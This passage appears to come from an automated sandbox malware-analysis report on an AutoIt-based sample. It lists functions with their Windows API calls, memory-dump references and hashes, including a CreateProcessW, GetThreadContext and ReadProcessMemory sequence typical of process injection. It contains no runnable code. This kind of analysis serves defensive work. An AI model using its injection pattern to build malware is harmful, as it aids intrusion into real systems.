            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01012C05
            • DeleteFileW.KERNEL32(?), ref: 01012C87
            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01012C9D
            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01012CAE
            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01012CC0
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: File$Delete$Copy
            • String ID:
            • API String ID: 3226157194-0
            • Opcode ID: ded1e6c6fd367efc87884379f1e2dc9e7d8582d1aade519dc2da617590a5c87c
            • Instruction ID: 1bdab275f572488435590bb20381b436874844f46ec391ec7ea119daf73163fb
            • Opcode Fuzzy Hash: ded1e6c6fd367efc87884379f1e2dc9e7d8582d1aade519dc2da617590a5c87c
            • Instruction Fuzzy Hash: F1B180B1D0011DABDF21DBA4CD85EDEB7BDEF49350F1040AAF609E6145EB389A448F60
            Function 00FA3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 952 fa3b1c-fa3b27 953 fa3b99-fa3b9b 952->953 954 fa3b29-fa3b2e 952->954 956 fa3b8c-fa3b8f 953->956 954->953 955 fa3b30-fa3b48 RegOpenKeyExW 954->955 955->953 957 fa3b4a-fa3b69 RegQueryValueExW 955->957 958 fa3b6b-fa3b76 957->958 959 fa3b80-fa3b8b RegCloseKey 957->959 960 fa3b78-fa3b7a 958->960 961 fa3b90-fa3b97 958->961 959->956 962 fa3b7e 960->962 961->962 962->959
            APIs
            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00FA3B0F,SwapMouseButtons,00000004,?), ref: 00FA3B40
            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00FA3B0F,SwapMouseButtons,00000004,?), ref: 00FA3B61
            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00FA3B0F,SwapMouseButtons,00000004,?), ref: 00FA3B83
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID: Control Panel\Mouse
            • API String ID: 3677997916-824357125
            • Opcode ID: a54174a7275fac593ae040f7262140e20025a2f92e34e4c05d5df2543ef2b7e6
            • Instruction ID: 21ec5f73e8349b0ede2ed2d3e2c633367e76f251534f03b3bdb0d8dca5222f17
            • Opcode Fuzzy Hash: a54174a7275fac593ae040f7262140e20025a2f92e34e4c05d5df2543ef2b7e6
            • Instruction Fuzzy Hash: D9112AB5511208FFDB208FA5DC85AAEB7BDEF46794B10445AB805E7114D331AE40A760
            Function 00F012A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
            Download Yara Rule
            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 00F01A5B
            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F01AF1
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F01B13
            Memory Dump Source
            • Source File: 00000000.00000002.1708173100.0000000000F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f00000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$ContextCreateMemoryReadThreadWow64
            • String ID:
            • API String ID: 2438371351-0
            • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
            • Instruction ID: de00c662e576db441060faf49b749ad90a1a3a61faa2254aade11e4097f0e027
            • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
            • Instruction Fuzzy Hash: E062F830A14258DBEB24CBA4C851BDEB376FF58300F1091A9D10DEB2D0E77A9E81DB59
            Function 00FADFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
            Download Yara Rule
            Strings
            • Variable must be of type 'Object'., xrefs: 00FF32B7
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: Variable must be of type 'Object'.
            • API String ID: 0-109567571
            • Opcode ID: 9bfd510bc926ac7474b9e69cdd61131928d53fe91826e1a514f9a3bc816f4c3a
            • Instruction ID: a5c13a61489a08329fa404b06f1e611bec768545878fa91e22648292471c92d3
            • Opcode Fuzzy Hash: 9bfd510bc926ac7474b9e69cdd61131928d53fe91826e1a514f9a3bc816f4c3a
            • Instruction Fuzzy Hash: 82C28AB1E00215CFCB24CF58C880BADB7B1BF4A320F248569E956AB391D375ED41EB91
            Function 00FAEC40 Relevance: 5.7, APIs: 3, Instructions: 1195COMMON
            Download Yara Rule
            APIs
            • __Init_thread_footer.LIBCMT ref: 00FAFE66
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Init_thread_footer
            • String ID:
            • API String ID: 1385522511-0
            • Opcode ID: 787e9ac7c460aa92637db42c998742cd7d13696401e7f218dabe82cd69fd925a
            • Instruction ID: ea732bddafa0ff29020ca69732e5df421bba0d805482b4e57102a4162853e7a5
            • Opcode Fuzzy Hash: 787e9ac7c460aa92637db42c998742cd7d13696401e7f218dabe82cd69fd925a
            • Instruction Fuzzy Hash: 87B27CB5A08341CFCB24CF54C480B2AB7E1BF8A310F14896DE9869B351D775ED49EB92
            Function 00FA3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
            Download Yara Rule
            APIs
            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FE33A2
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FA3A04
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: IconLoadNotifyShell_String_wcslen
            • String ID: Line:
            • API String ID: 2289894680-1585850449
            • Opcode ID: bdfb174514b2408543d7725ee0a2e7257b6dc7384d80d283b8d3838a6b3d895b
            • Instruction ID: 3d19bc57950ab90a4fc71ea5590d2652ad1184481e663440571aa466142d20fb
            • Opcode Fuzzy Hash: bdfb174514b2408543d7725ee0a2e7257b6dc7384d80d283b8d3838a6b3d895b
            • Instruction Fuzzy Hash: 7831D0B1808300AEC725EB20DC46BEBB7ECAF46310F04452EF4D993091DB789649D7C2
            Function 00FBFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
            Download Yara Rule
            APIs
            • __CxxThrowException@8.LIBVCRUNTIME ref: 00FC0668
              • Part of subcall function 00FC32A4: RaiseException.KERNEL32(?,?,?,00FC068A,?,01071444,?,?,?,?,?,?,00FC068A,00FA1129,01068738,00FA1129), ref: 00FC3304
            • __CxxThrowException@8.LIBVCRUNTIME ref: 00FC0685
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Exception@8Throw$ExceptionRaise
            • String ID: Unknown exception
            • API String ID: 3476068407-410509341
            • Opcode ID: bc4d62863bfdcb17ad7df24cf790254d301d593874b6a1e94011fd7fda88a66c
            • Instruction ID: c71957301a4dc004b74b5abc38ffe6720d8684fd43150e87016ad2e26f294065
            • Opcode Fuzzy Hash: bc4d62863bfdcb17ad7df24cf790254d301d593874b6a1e94011fd7fda88a66c
            • Instruction Fuzzy Hash: 06F0C834D0030FB78F00BA65DD4BE9D776C5E44360B508529B814D5591EF75DA2AF980
            Function 01013017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
            Download Yara Rule
            APIs
            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0101302F
            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 01013044
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Temp$FileNamePath
            • String ID: aut
            • API String ID: 3285503233-3010740371
            • Opcode ID: b77727a98edd45100662c810b335c41fd363cc9017128045ad63b3293c584d51
            • Instruction ID: e25182b1c1cea86c342362b8d99e1c7446af06a8c6873ccf61fe6d3f2d8190fc
            • Opcode Fuzzy Hash: b77727a98edd45100662c810b335c41fd363cc9017128045ad63b3293c584d51
            • Instruction Fuzzy Hash: F3D05B7250031467DA3096969D0DFCB3A6CD704650F0002527695E6085DAB59544CBD0
            Function 01027F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 010282F5
            • TerminateProcess.KERNEL32(00000000), ref: 010282FC
            • FreeLibrary.KERNEL32(?,?,?,?), ref: 010284DD
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$CurrentFreeLibraryTerminate
            • String ID:
            • API String ID: 146820519-0
            • Opcode ID: 268c5a56a964f10af01d9027a657ec307008ad16e3867810ea85c1377d506853
            • Instruction ID: d60479cd2f2f6a0ea77116d269cf8bc86c43492a97b60ac186141c814596db9f
            • Opcode Fuzzy Hash: 268c5a56a964f10af01d9027a657ec307008ad16e3867810ea85c1377d506853
            • Instruction Fuzzy Hash: 36129C75A083118FD714DF28C480B6ABBE5FF89318F04895EE9898B352CB35E945CF92
            Function 00FD5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0e388bf9c3efe763894c8a561771119e8fe507e8f0020b112d8caa27ba1adbd9
            • Instruction ID: 87b4cef2ede641f00af708e32c844430658e7e863cd9c10453f234e54ac89134
            • Opcode Fuzzy Hash: 0e388bf9c3efe763894c8a561771119e8fe507e8f0020b112d8caa27ba1adbd9
            • Instruction Fuzzy Hash: 1751CE71D1060AABDB219FB4CD45FEEBBBAAF45B20F18001BF404A7391D6798901FB61
            Function 00FA10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA1BF4
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA1BFC
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA1C07
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA1C12
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA1C1A
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA1C22
              • Part of subcall function 00FA1B4A: RegisterWindowMessageW.USER32(00000004,?,00FA12C4), ref: 00FA1BA2
            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FA136A
            • OleInitialize.OLE32 ref: 00FA1388
            • CloseHandle.KERNEL32(00000000,00000000), ref: 00FE24AB
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
            • String ID:
            • API String ID: 1986988660-0
            • Opcode ID: 67c58bf25f10b07211040819e555002e3f62a24387102089d4889a396419a1c5
            • Instruction ID: e3e1e9ad0358395d30680347834f803e95d31ba03baeb2eee279c9a2b5ce74c9
            • Opcode Fuzzy Hash: 67c58bf25f10b07211040819e555002e3f62a24387102089d4889a396419a1c5
            • Instruction Fuzzy Hash: 8471BCB4D11300CEC3A8EF79E9466553AE5FB49340759822AD0DAF72C9EB3E4405DF54
            Function 00FA54C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
            Download Yara Rule
            APIs
            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00FA556D
            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00FA557D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: dc7e5bf343b106c348a0f25a65e8987d995113c2c3103861fe154b44be5f744c
            • Instruction ID: f9de5fd8b3212bd661214d14d7e8e6e57f3caa8e553b401737737265141336d6
            • Opcode Fuzzy Hash: dc7e5bf343b106c348a0f25a65e8987d995113c2c3103861fe154b44be5f744c
            • Instruction Fuzzy Hash: 3E3160B1E00609FFDB14CF68C884B99B7B6FB48724F188229E91597240D771FD94EB90
            Function 00FD86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00FD85CC,?,01068CC8,0000000C), ref: 00FD8704
            • GetLastError.KERNEL32(?,00FD85CC,?,01068CC8,0000000C), ref: 00FD870E
            • __dosmaperr.LIBCMT ref: 00FD8739
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
            • String ID:
            • API String ID: 490808831-0
            • Opcode ID: c42a854080dbcb58e9c6a57a291f2cc85304c4501b6fc46ce6029f6cf68e21d2
            • Instruction ID: 62fba4434c0ae4f6948be0e657221da8f6d89467453d51e554f130ec94740d13
            • Opcode Fuzzy Hash: c42a854080dbcb58e9c6a57a291f2cc85304c4501b6fc46ce6029f6cf68e21d2
            • Instruction Fuzzy Hash: DB01DF33E0556026D66566349945B7E7B4B4B82BF4F3D021BF8149B3D2DD69CC82B250
            Function 01012FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,01012CD4,?,?,?,00000004,00000001), ref: 01012FF2
            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01012CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01013006
            • CloseHandle.KERNEL32(00000000,?,01012CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0101300D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: File$CloseCreateHandleTime
            • String ID:
            • API String ID: 3397143404-0
            • Opcode ID: 5e408147add9cb30ded627784773e0686b7537a6d5fc1fb2b53995cabab9cb18
            • Instruction ID: 5fc032aa171d0330be2732da2f054c77d8c0dbb98433555e4140b7fa533eba87
            • Opcode Fuzzy Hash: 5e408147add9cb30ded627784773e0686b7537a6d5fc1fb2b53995cabab9cb18
            • Instruction Fuzzy Hash: 98E0863228021077F2311659BD0DF8B3E5CD786B71F104215F799B90C046A5550153A8
            Function 00FB1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
            Download Yara Rule
            APIs
            • __Init_thread_footer.LIBCMT ref: 00FB17F6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Init_thread_footer
            • String ID: CALL
            • API String ID: 1385522511-4196123274
            • Opcode ID: 2fb3e19278752120baaee149c3ff4a5a6be9756ab240bfaca447c62e48464d09
            • Instruction ID: fc207b503d0500f73316a737755ea81480447fdde682ba45bd4366e36f33a269
            • Opcode Fuzzy Hash: 2fb3e19278752120baaee149c3ff4a5a6be9756ab240bfaca447c62e48464d09
            • Instruction Fuzzy Hash: 4E228B71A08201DFC724DF15C890BAABBF1BF85314F68891DE5868B361DB35E845EF92
            Function 01016EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
            Download Yara Rule
            APIs
            • _wcslen.LIBCMT ref: 01016F6B
              • Part of subcall function 00FA4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4EFD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LibraryLoad_wcslen
            • String ID: >>>AUTOIT SCRIPT<<<
            • API String ID: 3312870042-2806939583
            • Opcode ID: cd08918e37d1cadc1f99a3784b76720559feefd62598a317681a7f34c0721e97
            • Instruction ID: 2c8b431b4541142c5070168a37381ce5ead6bfaf07c3cb361f313b81aca5e48e
            • Opcode Fuzzy Hash: cd08918e37d1cadc1f99a3784b76720559feefd62598a317681a7f34c0721e97
            • Instruction Fuzzy Hash: 3AB1BE711083018FDB15EF24CC919AEB7E5AF95300F44886DF496872A6EF38ED49DB92
            Function 00FA2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
            Download Yara Rule
            APIs
            • GetOpenFileNameW.COMDLG32(?), ref: 00FE2C8C
              • Part of subcall function 00FA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA3A97,?,?,00FA2E7F,?,?,?,00000000), ref: 00FA3AC2
              • Part of subcall function 00FA2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA2DC4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Name$Path$FileFullLongOpen
            • String ID: X
            • API String ID: 779396738-3081909835
            • Opcode ID: d72defded69fab5fc25f9988bd47755a64d6ec0bd77afe2829fb3f22aa15353d
            • Instruction ID: e55e53c89d2a0627c630b224b3b129e3fdd10757f538b6d6fee77c0bbc971b7d
            • Opcode Fuzzy Hash: d72defded69fab5fc25f9988bd47755a64d6ec0bd77afe2829fb3f22aa15353d
            • Instruction Fuzzy Hash: 6B21F6B1E002989FCB41DF98CC45BDE7BFCAF49314F004019E445F7241DBB859899BA1
            Function 01012557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
